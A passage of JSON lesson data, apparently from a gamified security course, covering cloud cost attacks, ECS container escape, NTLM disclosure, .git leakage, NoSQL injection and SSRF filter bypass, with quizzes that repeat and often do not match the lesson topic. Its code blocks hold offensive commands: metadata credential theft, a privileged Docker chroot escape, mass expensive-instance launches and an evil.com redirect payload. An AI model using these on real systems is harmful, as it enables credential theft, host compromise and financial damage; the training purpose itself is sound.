Protocol","Variable Process","Verified Certificate"],"ans":0},{"type":"quiz","q":"Cloud forensics uses...","opts":["Disk imaging","API logs, snapshots, and flow logs","Memory only","Network only"],"ans":1}]},{"id":"cl-cost-attack","cat":"Cloud & Container","title":"Cloud Resource Exhaustion Attack","diff":3,"xp":200,"intro":"Spin up expensive resources to cause financial damage.","sections":[{"type":"text","content":"With compromised cloud credentials, an attacker can launch expensive GPU instances, transfer large amounts of data, or trigger high-cost API calls."},{"type":"code","lang":"bash","content":"# Financial impact attacks:\n# Launch expensive instances\naws ec2 run-instances --instance-type p4d.24xlarge --count 10\n# Trigger massive data transfer\naws s3 cp s3://big-bucket/ /dev/null --recursive\n# Deploy crypto miners on Lambda\n# Defense: billing alerts, service quotas, org SCPs"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Cloud cost attacks cause...","opts":["Data loss","Massive financial bills from expensive resource usage","Network outage","Account deletion"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1},{"type":"quiz","q":"GuardDuty provides...","opts":["Firewall","Threat detection","Orchestration","DNS"],"ans":1},{"type":"quiz","q":"RBAC controls...","opts":["Network","Who can do what in cluster","Images","Storage"],"ans":1},{"type":"quiz","q":"0.0.0.0/0 in SG means...","opts":["Blocked","Open to entire internet","Internal only","VPN only"],"ans":1},{"type":"quiz","q":"Metadata IP is...","opts":["10.0.0.1","127.0.0.1","169.254.169.254","192.168.1.1"],"ans":2},{"type":"quiz","q":"K8s secrets are...","opts":["Encrypted default","Base64 encoded (NOT encrypted)","Hashed","Compressed"],"ans":1},{"type":"quiz","q":"Shared responsibility means...","opts":["Provider does all","Security shared between provider and customer","Customer does all","No one"],"ans":1},{"type":"quiz","q":"Container shares host's...","opts":["Nothing","Kernel","RAM only","Disk only"],"ans":1},{"type":"quiz","q":"Shift-left means...","opts":["Move servers","Apply security earlier in development","Rotate keys","Change topology"],"ans":1},{"type":"quiz","q":"Sidecar container is...","opts":["Backup","Helper alongside main app","Monitor","Load balancer"],"ans":1},{"type":"quiz","q":"kubectl uses...","opts":["SSH","HTTPS to K8s API","FTP","SMTP"],"ans":1},{"type":"quiz","q":"IaC scanning catches issues...","opts":["After deploy","Before deployment (shift-left)","At runtime","In backups"],"ans":1},{"type":"quiz","q":"Container registry stores...","opts":["Logs","Container images","Firewall rules","DNS records"],"ans":1},{"type":"quiz","q":"VPC is a...","opts":["Virtual Private Cloud","Virtual Protocol","Variable Process","Verified Certificate"],"ans":0},{"type":"quiz","q":"Cloud forensics uses...","opts":["Disk imaging","API logs, snapshots, and flow logs","Memory only","Network only"],"ans":1}]},{"id":"cl-ecs-escape","cat":"Cloud & Container","title":"AWS ECS Container Escape","diff":4,"xp":250,"intro":"Break out of ECS containers to reach the host or other containers.","sections":[{"type":"text","content":"ECS runs containers on EC2 or Fargate. EC2-backed ECS containers can be escaped via Docker socket, privileged mode, or task role credential theft from metadata."},{"type":"code","lang":"bash","content":"# Check if running on EC2 (not Fargate)\ncurl http://169.254.169.254/latest/meta-data/\n# ECS task role credentials (different endpoint!)\ncurl http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI\n# If Docker socket is mounted\ndocker run -v /:/host --privileged alpine chroot /host"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"ECS task credentials are at which endpoint?","opts":["169.254.169.254","169.254.170.2 (ECS-specific metadata)","127.0.0.1","10.0.0.1"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1}]},{"id":"r-ntlm-info","cat":"Reconnaissance","title":"NTLM Information Disclosure","diff":2,"xp":150,"intro":"NTLM authentication responses leak internal domain and hostname.","sections":[{"type":"text","content":"When a service uses NTLM auth, the Type 2 challenge response contains: domain name, computer name, DNS name, and OS version \u2014 even if authentication fails."},{"type":"code","lang":"bash","content":"# Extract NTLM info from HTTP\ncurl -I --ntlm -u : https://target.com/\n# Nmap\nnmap -p 443 --script http-ntlm-info target.com\n# From SMB\ncrackmapexec smb target.com\n# Reveals: domain name, hostname, OS version"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"NTLM Type 2 responses reveal...","opts":["Passwords","Internal domain name, hostname, and OS version","Encryption keys","User accounts"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0},{"type":"quiz","q":"X-Frame-Options prevents...","opts":["XSS","Clickjacking (iframe embedding)","SQLi","CSRF"],"ans":1},{"type":"quiz","q":"Input validation should happen...","opts":["Client only","Server only","Both client and server","Neither"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2}]},{"id":"r-cloud-ip-ranges","cat":"Reconnaissance","title":"Cloud Provider IP Range Mapping","diff":2,"xp":150,"intro":"Determine which cloud provider hosts the target's infrastructure.","sections":[{"type":"text","content":"AWS, Azure, and GCP publish their IP ranges as JSON. Check if the target's IPs fall within cloud ranges to identify their hosting provider."},{"type":"code","lang":"bash","content":"# AWS IP ranges\ncurl -s https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes[] | select(.ip_prefix | startswith(\"target_ip_prefix\"))'\n# Azure\ncurl -s https://download.microsoft.com/download/.../ServiceTags_Public.json\n# GCP\ncurl -s https://www.gstatic.com/ipranges/cloud.json"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Cloud provider IP ranges help identify...","opts":["Vulnerabilities","Which cloud provider hosts the target's infrastructure","User accounts","Encryption types"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1}]},{"id":"r-security-txt","cat":"Reconnaissance","title":"security.txt Discovery","diff":1,"xp":50,"intro":"Check /.well-known/security.txt for vulnerability disclosure info.","sections":[{"type":"text","content":"RFC 9116 defines security.txt for vulnerability disclosure contact info. It also reveals: security team email, PGP key, bug bounty program, and preferred languages."},{"type":"code","lang":"bash","content":"curl -s https://target.com/.well-known/security.txt\ncurl -s https://target.com/security.txt\n# Contents reveal:\n# Contact: security@target.com\n# Encryption: https://target.com/pgp-key.txt\n# Acknowledgments: https://target.com/hall-of-fame"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"security.txt reveals...","opts":["Vulnerabilities","Security team contact info and bug bounty details","Passwords","Source code"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1}]},{"id":"r-source-code-leak","cat":"Reconnaissance","title":"Source Code Leakage Detection","diff":2,"xp":150,"intro":"Find exposed source code via .git, .svn, backup files, and error messages.","sections":[{"type":"text","content":"Check for: /.git/HEAD (git repo), /.svn/entries (SVN), /backup.zip, /wp-config.php.bak, and verbose error messages showing file paths."},{"type":"code","lang":"bash","content":"# Check for exposed .git\ncurl -s https://target.com/.git/HEAD\n# If accessible, dump the entire repo\ngitdumper https://target.com/.git/ output/\n# Check for backups\nfor ext in bak old swp save orig; do\n  curl -s -o /dev/null -w '%{http_code}' https://target.com/index.php.$ext\ndone"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Exposed .git directories allow...","opts":["Nothing","Downloading the entire source code repository","Only viewing commits","Only seeing branch names"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0},{"type":"quiz","q":"X-Frame-Options prevents...","opts":["XSS","Clickjacking (iframe embedding)","SQLi","CSRF"],"ans":1},{"type":"quiz","q":"Input validation should happen...","opts":["Client only","Server only","Both client and server","Neither"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1}]},{"id":"w2-nosql-adv","cat":"Web Application","title":"Advanced NoSQL Injection","diff":3,"xp":200,"intro":"Beyond $ne: $where, $regex, and JavaScript injection in MongoDB.","sections":[{"type":"text","content":"$where executes JavaScript. $regex extracts data character by character."},{"type":"code","lang":"bash","content":"POST /api {\"$where\":\"this.password.match(/^a.*/)\"}"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"$where in MongoDB...","opts":["Filters by ID","Executes JavaScript on the server","Only matches strings","Is disabled"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0},{"type":"quiz","q":"X-Frame-Options prevents...","opts":["XSS","Clickjacking (iframe embedding)","SQLi","CSRF"],"ans":1},{"type":"quiz","q":"Input validation should happen...","opts":["Client only","Server only","Both client and server","Neither"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1}]},{"id":"w2-ssrf-filter","cat":"Web Application","title":"SSRF Filter Bypass","diff":3,"xp":200,"intro":"Bypass SSRF blacklists and whitelists.","sections":[{"type":"text","content":"Use: decimal IP, IPv6, DNS rebinding, redirects, URL encoding."},{"type":"code","lang":"bash","content":"# Decimal IP: http://2130706433 = 127.0.0.1\n# IPv6: http://[::1]\n# Short: http://127.1\n# Redirect: http://evil.com/redirect?to=http://169.254.169.254"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Decimal IP 2130706433 equals...","opts":["10.0.0.1","127.0.0.1","192.168.1.1","8.8.8.8"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0},{"type":"quiz","q":"X-Frame-Options prevents...","opts":["XSS","Clickjacking (iframe embedding)","SQLi","CSRF"],"ans":1},{"type":"quiz","q":"Input validation should happen...","opts":["Client only","Server only","Both client and server","Neither"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP 